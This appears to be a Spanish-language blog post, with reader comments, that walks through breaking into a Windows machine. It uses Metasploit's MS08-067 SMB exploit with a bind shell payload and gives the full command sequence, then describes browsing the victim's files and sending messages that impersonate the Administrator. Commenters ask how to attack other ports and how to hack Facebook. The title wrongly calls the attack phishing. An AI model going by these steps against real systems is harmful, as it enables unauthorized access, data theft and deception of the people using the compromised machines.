Manual de Ataque sobre Acceso a un Sistema (phihing)
Pasos:
1. En primer lugar miramos si el equipo responde, hacemos un ping a la máquina.
2. Escaneamos y vemos los puertos que estén abiertos, en este caso el 445 está habilitado y para esta vulnerabilidad es el ms08_067_netapi. Y pasamos a configurar el metasploit.
3. Para abrir el Metasploit ejecutamos el comando msfconsole.
4. En la consola ejecutamos la vulnerabilidad de Windows use window/smb/ms08_067_netapi
5. Mostramos las opciones que esten configuradas en ese momento
show options
6. Entonces procedemos a asignarle RHOST (dirección IP de la máquina que se va a atacar) y se define por defecto el puerto vulnerable.
set RHOST direccion_ip_del_atacado
7. Luego asignamos el payload
set payload windows/shell/bind_tcp
8. Revisamos las opciones
show options
9. Le asignamos también LHOST nuestra dirección IP del backtrack
set LHOST dirección_ip_del_backtrack
10. Una vez configurado todo eso ejecutamos el exploit para acceder al sistema.
11. Una vez ejecutado el exploit ya estamos dentro del cmd de windows y podemos navegar por los archivos y discos de la máquina, le podemos enviar mensajes; y el usuario atacado va a creer que es el Administrador el que le envíe el mensaje.
Además la puerta de enlace del windows será la del backtrack, y el usuario creerá que éste es realmente el servidor que le proporciona internet.
Gracias.
Muy buena la informacion, pero si el puerto que se encuentra habilitado es el 3389 y no el 445 que comando debo utilizar?
Estimado, debe utilizar un exploit del puerto 3389 es decir un exploit de Remote Desktop Connection! En Metaesploit ponga show exploits. Saludos!
Gracias por tu comentario! Saludos
Oye y si el puerto disponible es el 139???
oyes y como le puedo mandar mensajes ya estando dentro de su makina?….gracias
como ago para el link de hackiar facebook 2013 – 2014
Estoy haciendo un proyecto de fin de master que trata de la vulnerabilidades del DNS y me gustaria saber si tienen algunas info que me puedan enviar y tambien como evitar estos ataques. Mi email. dariowins@gmail.com